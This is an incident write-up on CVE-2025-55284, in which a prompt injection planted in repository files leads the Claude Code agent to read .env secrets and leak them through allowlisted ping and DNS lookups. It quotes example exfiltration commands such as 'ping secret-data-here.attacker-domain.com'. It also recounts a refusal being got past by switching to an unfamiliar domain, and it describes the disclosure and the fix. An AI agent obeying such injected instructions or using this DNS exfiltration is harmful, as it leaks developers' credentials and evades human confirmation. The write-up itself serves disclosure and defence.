Claude Code agent allowed data exfiltration via DNS requests

Claude Code is Anthropic's AI coding agent - a command-line tool that reads source files, writes code, and executes bash commands on a developer's machine. Like other AI coding assistants, it operates with a human-in-the-loop confirmation system: when Claude wants to run a command that might have side effects, it asks the developer for permission. Unless the command is on an allowlist of pre-approved "safe" utilities, like cat, ls, grep, and - as it turned out - ping, nslookup, dig, and host.

Security researcher wunderwuzzi (reporting through HackerOne as wunderwuzzi23) discovered that this allowlist created a clean path for data exfiltration. The vulnerability was assigned CVE-2025-55284, classified as CWE-78 (OS command injection), and triaged at CVSS 7.1 (High).

The attack

The proof of concept was straightforward. An attacker embeds a prompt injection in a source code file - a comment, a string, a README, any text content that Claude Code would process. When a developer asks Claude to review or analyze the repository, the agent ingests the file contents, including the malicious instruction.

The injected prompt tells Claude to read a sensitive file - say, .env, which commonly holds API keys, database credentials, and other secrets - and then embed the extracted data in a DNS query. Specifically, it instructs Claude to run a ping command with the stolen data encoded as a subdomain: ping secret-data-here.attacker-domain.com. The ping command triggers a DNS lookup, and that lookup transmits the data to a DNS server the attacker controls.

DNS exfiltration is a well-known technique in network security. It is effective because DNS traffic is almost never blocked by firewalls. Every machine needs to resolve domain names, so DNS requests flow freely outward even from heavily restricted environments. The data capacity per request is limited, but for exfiltrating API keys, tokens, and short credentials, it is more than sufficient.

The key detail: ping was on Claude Code's allowlist. Claude did not need to ask the developer for permission before running it. The exfiltration happened silently, without a confirmation prompt, without a log entry that a developer would notice, and without any visible indication that anything abnormal had occurred.

Discovery details

wunderwuzzi published a detailed writeup on Embrace The Red as part of the "Month of AI Bugs 2025" research series. The discovery process itself had some notable quirks.

During testing, wunderwuzzi found that Claude was trained to refuse requests involving common security testing services like oast.me or Burp Collaborator - out-of-band application security testing (OAST) domains that are well-known in the pentesting community. When the researcher pointed Claude at those domains, it recognized the security testing context and refused to cooperate.

But when the researcher switched to wuzzi.net - a domain not associated with security testing utilities - Claude executed the request without hesitation. The refusal was based on pattern-matching against known testing infrastructure, not on understanding that embedding sensitive data in DNS queries is dangerous regardless of the destination domain. It was the kind of defense that stops the demonstration but not the attack.

wunderwuzzi also noted using Claude itself to analyze Claude Code's source code and identify the allowlist bypasses - "something I commonly do, to help accelerate my efforts when reviewing code." The AI was, in effect, helping the researcher find vulnerabilities in the AI.

The allowlist problem

Claude Code's confirmation system is designed to prevent the agent from executing potentially dangerous commands without explicit user approval. When Claude wants to run rm -rf or curl a URL or execute an arbitrary script, it pauses and asks. The developer reviews the command, approves or denies it, and maintains control over what happens on their machine.

The allowlist - the set of commands pre-approved to run without confirmation - is intended for utilities that are generally safe. Reading files, listing directories, searching text. The problem was that the allowlist included network utilities: ping, nslookup, dig, and host. All four of these can be used to make outbound DNS requests. All four can encode arbitrary data in the query string. And all four ran without triggering a confirmation prompt.

The vulnerability was not a bug in the traditional sense - no buffer overflow, no memory corruption, no authentication bypass. It was a design decision about which commands to trust. The allowlist was "overly broad," as the official security advisory put it. Commands that seemed harmless in isolation became exfiltration tools when used by an AI agent that could be manipulated through prompt injection.

Prompt injection sources

The injected prompt can originate from any content that enters Claude Code's context window. wunderwuzzi listed the vectors: source code files, comments, README files, pull requests, MCP server responses, web search results - anything the agent processes as input. The researcher chose a source code file for the demonstration because it was the fastest to test, but a malicious pull request or a compromised dependency's README would work equally well.

This is the same indirect prompt injection pattern seen across AI assistants throughout 2025. The AI processes content from an untrusted source as part of its input, treats instructions in that content as commands to follow, and executes them with whatever permissions it has. The specific exfiltration channel - DNS - was new for AI agent attacks, but the underlying mechanism was the same.

Anthropic's response

wunderwuzzi disclosed the vulnerability to Anthropic on May 26, 2025. The Anthropic security team triaged it quickly and reported the fix as shipped on June 6, 2025, in Claude Code version 1.0.4. The mitigation was what the researcher had proposed: removing ping, nslookup, dig, and host from the allowlist so that those commands require user confirmation before execution.

Claude Code auto-updates by default, so most users received the fix automatically. Anthropic subsequently deprecated all versions prior to 1.0.24, forcing any remaining holdouts to update. The response was fast and the fix was appropriate - removing the problematic commands from the allowlist directly addressed the exfiltration channel without breaking normal workflows.

The broader pattern

CVE-2025-55284 is a specific instance of a general problem with AI coding agents: the agent has broad access to the developer's environment, it can be manipulated through content it processes, and the boundary between "safe" and "unsafe" operations depends on context that static allowlists cannot capture.

ping is a safe command when a developer uses it to check network connectivity. ping stolen-api-key.attacker.com is data exfiltration. The command itself is the same. The safety depends entirely on the arguments, and those arguments are controlled by whatever prompt injection the agent ingested.

The same logic applies to other commands that most allowlists would consider harmless. curl can exfiltrate data over HTTP. git push can commit and push backdoored code. echo ... > file can modify configuration files. Every command that interacts with the filesystem or network is a potential exfiltration or modification channel when an AI agent is executing it under the influence of injected instructions.

The fix - requiring confirmation for network utilities - is correct for this specific exploit. But the allowlist approach itself is a tradeoff between usability (fewer confirmation prompts) and security (more oversight of what the agent does). Every command removed from the allowlist adds friction. Every command left on it is a potential bypass. Finding the right boundary is an ongoing challenge for every AI coding tool that executes commands on behalf of its users.

Vibe Graveyard

Claude Code agent allowed data exfiltration via DNS requests

Incident Details

Tech Stack

References